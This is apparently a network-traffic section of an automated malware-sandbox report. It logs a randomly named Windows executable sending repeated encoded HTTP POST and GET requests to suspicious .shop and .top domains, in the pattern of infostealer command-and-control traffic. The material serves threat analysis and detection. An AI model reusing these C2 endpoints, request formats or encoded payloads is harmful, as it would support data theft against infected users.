0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50012	104.21.48.1	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:24.208802938 CET	577	OUT	GET /j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.axis138ae.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:44:24.660492897 CET	1214	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:44:24 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Fri, 10 Jan 2025 16:44:24 GMT Location: https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA== Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpmlF7gx7MHpAH8gVFhmHN%2BXEXchCg3L2e69H2Hw1EWqlH11BKoK3aAkjVvh%2BfFvWfZlM%2FTFszyMmxZvTSu89vzs9HWLA07afRbdiGr%2Fb37FfF1EYBCP9kJbKUFSm9i5KUTOlOo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8ffdc9c9cf1fc461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=577&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50013	134.122.133.80	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:38.625178099 CET	851	OUT	POST /iuei/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.x3kwqc5tye4vl90y.top Referer: http://www.x3kwqc5tye4vl90y.top/iuei/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6a 63 72 36 68 65 79 44 49 75 57 57 79 57 45 50 6f 6a 67 42 6c 66 48 73 72 6a 36 78 43 62 7a 48 44 68 36 74 6c 72 37 62 2b 69 32 73 49 79 6b 65 44 48 71 41 4c 61 44 6a 4d 72 46 49 42 62 5a 46 45 46 65 77 4b 32 52 54 48 6f 34 6a 4c 48 38 65 58 6d 76 31 36 73 4e 44 30 66 52 53 62 5a 67 4b 35 76 6f 64 6a 67 61 35 4b 6b 43 6f 75 38 77 39 41 30 36 76 71 4a 6b 41 4c 45 2f 42 78 42 6a 66 59 49 72 57 2b 72 71 62 58 7a 47 39 6b 31 68 4a 65 57 78 68 72 59 44 35 79 46 74 34 74 6b 32 56 41 32 65 5a 31 6b 33 31 37 43 71 4b 2f 49 45 2f 33 50 71 53 74 48 72 4f 34 54 73 75 55 6e 41 73 6c 55 75 6f 41 72 6f 3d Data Ascii: V8=jcr6heyDIuWWyWEPojgBlfHsrj6xCbzHDh6tlr7b+i2sIykeDHqALaDjMrFIBbZFEFewK2RTHo4jLH8eXmv16sND0fRSbZgK5vodjga5KkCou8w9A06vqJkALE/BxBjfYIrW+rqbXzG9k1hJeWxhrYD5yFt4tk2VA2eZ1k317CqK/IE/3PqStHrO4TsuUnAslUuoAro=
Jan 10, 2025 16:44:39.498950005 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Fri, 10 Jan 2025 15:44:39 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50014	134.122.133.80	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:41.171515942 CET	871	OUT	POST /iuei/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.x3kwqc5tye4vl90y.top Referer: http://www.x3kwqc5tye4vl90y.top/iuei/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6a 63 72 36 68 65 79 44 49 75 57 57 30 33 30 50 74 45 55 42 69 2f 48 74 6b 44 36 78 4c 37 7a 44 44 6d 79 74 6c 76 4b 47 2b 52 65 73 49 57 6f 65 43 47 71 41 47 36 44 6a 56 62 45 6a 4d 37 5a 65 45 46 53 4f 4b 33 74 54 48 6f 73 6a 4c 47 4d 65 58 52 7a 30 6f 4d 4e 42 74 50 52 55 56 35 67 4b 35 76 6f 64 6a 67 50 69 4b 6e 79 6f 76 4d 41 39 42 52 4f 6f 72 4a 6b 66 43 6b 2f 42 31 42 6a 54 59 49 72 6b 2b 71 32 68 58 78 2b 39 6b 78 74 4a 51 6e 78 69 6c 6f 44 2f 38 6c 73 4f 75 6d 6a 34 4b 41 71 46 77 45 44 32 39 41 32 73 2b 2b 31 56 74 74 69 36 2b 6e 48 32 6f 41 6b 5a 46 58 68 46 2f 33 2b 59 65 38 2f 49 68 45 34 2b 41 4f 71 53 52 41 39 6b 38 59 67 74 56 6a 34 6d Data Ascii: V8=jcr6heyDIuWW030PtEUBi/HtkD6xL7zDDmytlvKG+ResIWoeCGqAG6DjVbEjM7ZeEFSOK3tTHosjLGMeXRz0oMNBtPRUV5gK5vodjgPiKnyovMA9BROorJkfCk/B1BjTYIrk+q2hXx+9kxtJQnxiloD/8lsOumj4KAqFwED29A2s++1Vtti6+nH2oAkZFXhF/3+Ye8/IhE4+AOqSRA9k8YgtVj4m
Jan 10, 2025 16:44:42.068195105 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Fri, 10 Jan 2025 15:44:41 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50015	134.122.133.80	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:43.720895052 CET	1888	OUT	POST /iuei/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.x3kwqc5tye4vl90y.top Referer: http://www.x3kwqc5tye4vl90y.top/iuei/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 6a 63 72 36 68 65 79 44 49 75 57 57 30 33 30 50 74 45 55 42 69 2f 48 74 6b 44 36 78 4c 37 7a 44 44 6d 79 74 6c 76 4b 47 2b 52 47 73 49 6a 30 65 44 6c 53 41 48 36 44 6a 4b 72 46 45 4d 37 59 47 45 42 2b 4b 4b 33 68 6c 48 71 55 6a 4e 68 6b 65 66 44 62 30 6a 4d 4e 42 69 76 52 56 62 5a 68 49 35 76 34 6e 6a 67 66 69 4b 6e 79 6f 76 4f 59 39 47 45 36 6f 6d 70 6b 41 4c 45 2f 56 78 42 69 45 59 49 7a 30 2b 71 69 78 58 68 65 39 6c 56 42 4a 63 31 5a 69 6e 49 44 39 73 31 73 47 75 6d 2f 37 4b 41 65 4a 77 45 47 64 39 43 32 73 2b 50 51 57 31 74 36 78 74 78 48 38 6b 42 38 59 46 43 42 4f 79 31 47 74 63 38 58 6e 6b 31 46 63 41 70 43 51 55 54 70 6f 6f 39 6b 33 5a 32 78 49 44 46 59 4a 54 39 39 6d 6c 2f 5a 58 73 6d 59 78 2f 33 68 50 53 61 4a 46 48 4d 79 43 48 59 56 35 73 43 59 66 48 48 45 70 37 74 58 72 47 75 4d 2f 64 5a 6c 49 58 4b 67 41 34 4b 61 68 65 42 65 6b 72 77 2f 65 64 6b 31 62 63 45 6a 30 75 64 43 31 6d 53 75 52 6a 4d 57 65 41 64 53 6f 73 54 75 37 47 61 68 50 76 51 42 43 45 2f 31 71 55 62 45 70 2b 50 6e [TRUNCATED] Data Ascii: V8=jcr6heyDIuWW030PtEUBi/HtkD6xL7zDDmytlvKG+RGsIj0eDlSAH6DjKrFEM7YGEB+KK3hlHqUjNhkefDb0jMNBivRVbZhI5v4njgfiKnyovOY9GE6ompkALE/VxBiEYIz0+qixXhe9lVBJc1ZinID9s1sGum/7KAeJwEGd9C2s+PQW1t6xtxH8kB8YFCBOy1Gtc8Xnk1FcApCQUTpoo9k3Z2xIDFYJT99ml/ZXsmYx/3hPSaJFHMyCHYV5sCYfHHEp7tXrGuM/dZlIXKgA4KaheBekrw/edk1bcEj0udC1mSuRjMWeAdSosTu7GahPvQBCE/1qUbEp+PnhQEK9TaBXGjFXodJSfa/SvoQ1boMqrh+Eb12nBPPXa5sl1f8FMzQNzi68eKmxZW0NXaUOw5pQ2nCNgC56SKGpXKGz6i/ID16sAoR6AO0idklLg7e+ZsITHlUIre6H9fPFOWOURE+cYtlnGMvzQLLWQK16X/g+4KSEzO7U0POHGzApQLgdNMjpUOtBXAJPxDlrjIK/NrKt1Zxdj+W8Cilf6HrDA6yvP6YtQxodh+TCoQ2qF9vR/yD6j+0jzNbSrmeXGNFhhcr7ooECVUMYWILyCAEQKeqzD4Y1IDGZp/C65WwbOhgE/lAxh+AsHhVOPm++IDjLFC9ARs9WFBJN8KY425GknwsOg5IctsDS7lSOqPVkiRycFBiNRx6wveWoFG++0fR6MXDmcUDZkPXoi0mtA741Kdl2ENvP3vV7jsLnQ7I6/5Sp765aMOC5dxy4ZbrWp4m5gZ5ZEL/JGUj0VZZu2Ra9OUeVaptTUcP2wwWhQ8VRptsW8UbIcCq+ufADaPX/W8UHGsul/unUfNadhGMGGjvbUZQ9Pig6EO5mgmNzd4zuhd0WQenbAWi5lEsXQ0fm2ru4kQiLkQoLkRbRggCXUI9wkpBvitBKDWo5ZCD3FGBoY9Tcnc4EqCRgtXAvC2OqPVjRW+PSrVfDim3gRpZ+u3QbRcXsMtYac [TRUNCATED]
Jan 10, 2025 16:44:44.612195969 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Fri, 10 Jan 2025 15:44:44 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50016	134.122.133.80	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:46.257652044 CET	583	OUT	GET /iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:44:47.149096012 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Fri, 10 Jan 2025 15:44:46 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50017	93.127.192.201	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:52.243621111 CET	854	OUT	POST /qfbg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.al-madinatraders.shop Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.al-madinatraders.shop Referer: http://www.al-madinatraders.shop/qfbg/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 49 71 62 36 74 69 53 6b 71 4a 4c 63 2b 4f 48 46 6c 6f 62 66 44 39 63 31 57 73 73 68 58 63 4e 53 33 54 49 63 46 36 4b 42 77 56 53 71 54 6d 67 7a 65 39 4b 58 52 70 2b 6d 46 4c 5a 68 54 54 37 52 35 79 65 5a 41 55 4a 66 35 50 42 74 7a 6c 6d 41 34 6b 76 53 6c 70 49 62 52 59 52 56 73 2f 51 65 66 44 6b 44 43 6f 2f 4e 58 37 7a 6a 59 42 6b 41 48 76 4f 42 4e 4d 33 31 79 5a 6b 39 34 44 36 59 73 57 42 51 78 35 78 43 65 42 33 43 51 58 6d 6d 71 36 77 49 71 42 53 4c 4d 76 4d 70 4d 63 6c 31 30 69 66 4f 4e 76 4e 7a 75 6c 63 35 6e 79 32 57 47 64 6c 37 4d 64 39 73 65 47 58 62 58 6e 4d 57 67 48 4a 4e 41 71 63 3d Data Ascii: V8=Iqb6tiSkqJLc+OHFlobfD9c1WsshXcNS3TIcF6KBwVSqTmgze9KXRp+mFLZhTT7R5yeZAUJf5PBtzlmA4kvSlpIbRYRVs/QefDkDCo/NX7zjYBkAHvOBNM31yZk94D6YsWBQx5xCeB3CQXmmq6wIqBSLMvMpMcl10ifONvNzulc5ny2WGdl7Md9seGXbXnMWgHJNAqc=
Jan 10, 2025 16:44:52.907298088 CET	715	IN	HTTP/1.1 403 Forbidden Connection: close x-powered-by: PHP/5.6.40 set-cookie: csrf_cookie_name=1dd8f356cad07854855386b19d5fe9ef; expires=Fri, 10-Jan-2025 17:44:52 GMT; Max-Age=7200; path=/ content-type: text/html; charset=UTF-8 content-length: 196 content-encoding: gzip vary: Accept-Encoding date: Fri, 10 Jan 2025 15:44:52 GMT server: LiteSpeed platform: hostinger strict-transport-security: max-age=31536000; includeSubDomains; preload x-xss-protection: 1; mode=block x-content-type-options: nosniff Data Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8\|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K\|pC9};bV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50018	93.127.192.201	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:54.800040007 CET	874	OUT	POST /qfbg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.al-madinatraders.shop Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.al-madinatraders.shop Referer: http://www.al-madinatraders.shop/qfbg/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 49 71 62 36 74 69 53 6b 71 4a 4c 63 73 39 66 46 6a 4a 62 66 49 39 63 79 4b 38 73 68 46 63 4e 57 33 54 4d 63 46 37 4f 72 77 6e 47 71 55 44 63 7a 59 4d 4b 58 57 70 2b 6d 4b 62 5a 75 63 7a 37 4f 35 79 43 37 41 56 31 66 35 4c 68 74 7a 6c 32 41 34 56 76 52 6c 35 49 5a 5a 34 52 58 69 66 51 65 66 44 6b 44 43 73 57 57 58 37 72 6a 62 7a 77 41 56 65 50 7a 54 63 33 32 37 35 6b 39 79 6a 36 63 73 57 42 79 78 34 73 6c 65 44 2f 43 51 54 71 6d 6b 4a 6f 4c 78 78 53 4e 43 50 4e 64 44 38 45 4a 77 54 6a 66 41 73 67 4e 78 57 67 64 6d 45 48 38 63 2f 74 54 66 39 52 55 4f 56 66 73 47 58 74 2f 36 6b 5a 39 65 39 4a 49 69 37 58 42 62 62 49 58 43 66 45 72 5a 2b 33 74 37 49 67 66 Data Ascii: V8=Iqb6tiSkqJLcs9fFjJbfI9cyK8shFcNW3TMcF7OrwnGqUDczYMKXWp+mKbZucz7O5yC7AV1f5Lhtzl2A4VvRl5IZZ4RXifQefDkDCsWWX7rjbzwAVePzTc3275k9yj6csWByx4sleD/CQTqmkJoLxxSNCPNdD8EJwTjfAsgNxWgdmEH8c/tTf9RUOVfsGXt/6kZ9e9JIi7XBbbIXCfErZ+3t7Igf
